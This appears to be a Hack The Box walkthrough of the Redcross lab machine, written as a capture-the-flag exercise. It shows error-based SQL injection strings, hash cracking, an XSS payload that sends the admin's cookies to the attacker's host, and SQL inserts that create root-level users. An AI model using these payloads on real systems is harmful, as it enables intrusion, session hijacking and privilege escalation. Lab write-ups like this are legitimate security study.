Redcross Writeup / Walkthrough Hack the box

Redcross writeup Summery

TL;DR

This Writeup is about Redcross on hack the box. It was a Linux box. It starts off with web exploitation via xss on admin stealing his cookies to login to the admin panel. Than command injection in the firewall to get a shell as www-data after recon we find the password to the database which creates users. we create user with uid 0 and then go back in as that user enumerate more to get root password on the database we log in as root and create a root user on the box su as that user and we get root.

Walkthrough

Scanning Network

I did a Nmap scan and I found port 80,443 and port 22 was open and there was’nt much information in the results for port 443 we see that there is a subdomain.

Its called https://intra.redcross.htb and that’s all there is. we don’t find much in this Nmap scan.

So let’s look up our Nmap results.

Nmap scan report for redcross.htb (10.10.10.113)
Host is up (0.51s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
|   256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_  256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp  open  http     Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open  ssl/http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after:  2021-02-27T19:46:58
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I added the subdomain and domain to my etc/hosts file and started to enumerate the SSL certificate on intra.redcross.htb. After this, I started my background recon before starting to look at the web portion of this machine.

Reacon

First I started gobuster on intra.redcorss.htb it found some directories. Documentation directory sounded really interesting so I started another gobuster to scan for all the pdf and txt files to dir bust. we found account-signup.pdf which has instructions to sign up with a new account.

root:~ gobuster dir -u https://intra.redcross.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -t 50 -o root.gobust -k 

/images (Status: 301)
/pages (Status: 301)
/documentation (Status: 301)
/javascript (Status: 301)
/server-status (Status: 403)

root:~ gobuster dir -u https://intra.redcross.htb/documentation -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -t 50 -o documentation.gobust -k -x pdf,txt

/account-signup.pdf (Status: 200)

Intra.redcross.htb also suggested that there might be other subdomains so I started wfuzz to scan for subdomains.

wfuzz -H 'Host: FUZZ.redcross.htb' -u 'https://10.10.10.113' -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hw 28

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: https://10.10.10.113/
Total requests: 484700
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                             
===================================================================

000000071:   302        0 L      18 W     363 Ch      "admin"                                                                             
Finishing pending requests...

and we found a subdomain called admin.redcross.com i added that to our host file as well. I looked at it but left it as we had found a way to sign up.

SQL Injection

So we go to that link mentioned and we do as it says. I tried to sign up a user but it just gave me temporary credentials guest:guest. So I went and logged in as a guest. There was not much on the page except the filter field so I tried adding a single quote after 1 and we got a SQL Error I thought this was a SQL Injection so I tried several things and there was no output. So I tried to find a way to extract data in the error itself thankfully extractvalue() function in SQL lets us do an Xpath injection to extract data in the error itself.

'5' or dest like '1'') LIMIT 10'


'5' or dest like '<injection>') LIMIT 10'

assumption - select message from table where (message like '5' or dest like '<injection>') LIMIT 10'

1')-- -

select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,version())-- -  !!') LIMIT 10'

to get the version of the db in error message


select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1)))-- -  !!') LIMIT 10'

to extract DB names
select message from table where (message like '5' or dest like 
'!! 
    ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)))-- -  
!!') LIMIT 10'
--dbname redcross

To extract Table names
select message from table where (message like '5' or dest like 
'!! 
    ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA like "redcross" LIMIT 1,1)))-- -  
!!') LIMIT 10'
-- tables: messages, requests, users

To extract Column names 
select message from table where (message like '5' or dest like 
'!! 
    ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME like "users" LIMIT 0,1)))-- -  
!!') LIMIT 10'
--COLUMNS id, username, password, mail, role

to extract usernames:- 
select message from table where (message like '5' or dest like 
'!!
    ') and extractvalue(0x0a,concat(0x0a,(select username from users LIMIT 0,1)))-- -  
!!') LIMIT 10'
--usernames admin, penelope charles tricia guest

to extract passwords
select message from table where (message like '5' or dest like 
'!!
    ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 0,1) from 1)))-- -
!!') LIMIT 10'

--passwords 
       admin:$2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
       penelope:$2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
       charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
       tricia:$2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
       guest:$2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi

In the file above between the !! signs is the injected code closed with another two !! and the notes helped me keep track of the data I have extracted already.

This is how i got all the user names and password hashes and usernames.I used hashcat to crack these hashes and we found that password for user charles is cookiemonster.

root@kali:~ hashcat --example-hashes | grep 3200 -A 3 
--
MODE: 3200
TYPE: bcrypt $2*$, Blowfish (Unix)
HASH: $2a$05$MBCzKhG1KhezLh.0LRa0Kuw12nLJtpHy6DIaU.JAnqJUDYspHC.Ou
PASS: hashcat
--

hashcat  -m 3200 -O /root/Desktop/HackTheBox-Machines/Redcross/redcross.users /usr/share/wordlists/rockyou.txt --user --force 

$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i:cookiemonster
                                                 
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: /root/Desktop/HackTheBox-Machines/Redcross/redcross.users
Time.Started.....: Sun Apr 26 03:48:28 2020 (1 sec)
Time.Estimated...: Sun Apr 26 03:48:29 2020 (0 secs)
Guess.Base.......: File (cheatlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        3 H/s (0.13ms) @ Accel:4 Loops:2 Thr:8 Vec:8
Recovered........: 1/5 (20.00%) Digests, 1/5 (20.00%) Salts
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 1/1 (100.00%)
Restore.Sub.#1...: Salt:4 Amplifier:0-1 Iteration:1022-1024
Candidates.#1....: cookiemonster -> cookiemonster

XSS

So I logged in as Charles and found messages on his dashboard about some problem with the admin website. Which is suggesting there is some cross-site scripting attack. It says alerts popping everywhere so I assumed that maybe there is a simulated admin user and we have to do an XSS attack steal his cookies and get admin on the web.

Also in the last message charles said that he fixed the contact form so may be there is a simulated user who creates the user account by reading stuff submitted in contact form.

<script>document.write('<img src="https://10.10.14.8/collect.gif?cookie=' + document.cookie + '" />')</script>

If we can get his cookies maybe we can steal his session. So i tried different combinations but all filed at last i tried to put a script tag in number field of the form and we got the admin cookies.

Replacing my cookies with admins cookie i got access to the dashboard.

Here we have a firewall and user management I added a user in user management and we got an ssh user with its password. When I logged in that user i found that this was a restricted chroot shell where we don’t even have complete filesystem of Linux.

Now after not getting anywhere with that shell I went and explored the firewall link for a while. If you whitelist your IP in the firewall it’ll show you more ports open but I didn’t find anything much interesting. I assumed that this is running IP tables command on the backend judging from the output and input and I tried doing command injection. Found command injection in denying function of the firewall. And got a shell as a www-data user in the box.

Redcross writeup: User

Now i started doing recon and found that actions.php file had database password and username in it for the user unixusermgr which sounded like the database which was creating users before when we created our test user earlier in the user manager. So I logged in to the psql shell using those creds and found the users we just made.

I used /d to get all the tables and in it there was a passwd_table which had these user accounts.

unix=> \d
              List of relations
 Schema |     Name     |   Type   |  Owner   
--------+--------------+----------+----------
 public | group_id     | sequence | postgres
 public | group_table  | table    | postgres
 public | passwd_table | table    | postgres
 public | shadow_table | table    | postgres
 public | user_id      | sequence | postgres
 public | usergroups   | table    | postgres

unix=> select * from passwd_table;

 username |               passwd               | uid  | gid  | gecos |    homedir     |   shell   
----------+------------------------------------+------+------+-------+----------------+-----------
 tricia   | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 |       | /var/jail/home | /bin/bash
 ipp      | $1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ. | 2020 |    0 |       | /              | /bin/bash
 batman   | $1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ. |    0 |    0 |       | /              | /bin/bash
 bugs     | $1$KkZCHcOx$7DhQiKjOAiGlBOTvxZdVt0 | 2023 | 1001 |       | /var/jail/home | /bin/bash
(4 rows)

unix=> \dp
                                           Access privileges
 Schema |     Name     |   Type   |      Access privileges       |    Column privileges     | Policies 
--------+--------------+----------+------------------------------+--------------------------+----------
 public | group_id     | sequence |                              |                          | 
 public | group_table  | table    | postgres=arwdDxt/postgres   +|                          | 
        |              |          | unixnss=r/postgres           |                          | 
 public | passwd_table | table    | postgres=arwdDxt/postgres   +| username:               +| 
        |              |          | unixnss=r/postgres          +|   unixusrmgr=aw/postgres+| 
        |              |          | unixusrmgr=rd/postgres      +| passwd:                 +| 
        |              |          | unixnssroot=arwdDxt/postgres |   unixusrmgr=aw/postgres+| 
        |              |          |                              | gid:                    +| 
        |              |          |                              |   unixusrmgr=aw/postgres+| 

unix=> insert into passwd_table (username,passwd,gid,homedir) values('spiderman','$1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ.',0,'/');
INSERT 0 1

We had fields like username passwd,uid,gid,homedir. So I tried to create a user with elevated privileges but it failed as I didn’t have permission to create a user with uid’s. I created a user with gid of 0 which will give us higher privileges than www-data by adding the user to the root group.\

Redcross writeup : Root

now I sshed in as the user spiderman and ran linenum.sh to find out that there is a file called nss-pgsql-root.conf in the /etc folder I did an ls -ltr to see the latest modified files and this looked interesting. It had psql root credentials.

Now i logged in the db and used my previous command to add a user as root.

insert into passwd_table (username,passwd,uid,gid,homedir) values('batman','$1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ.',0,0,'/');

and it got added successfully so now i tried to ssh with this user and its password but it didnt work so maybe ssh from root user is blocked i tried to do a su batman with my password and i logged in as root.

If you liked this write-up or have any questions please leave a comment below thanks for reading 🙂 .Check out my other write-ups enterprise was my own favorite.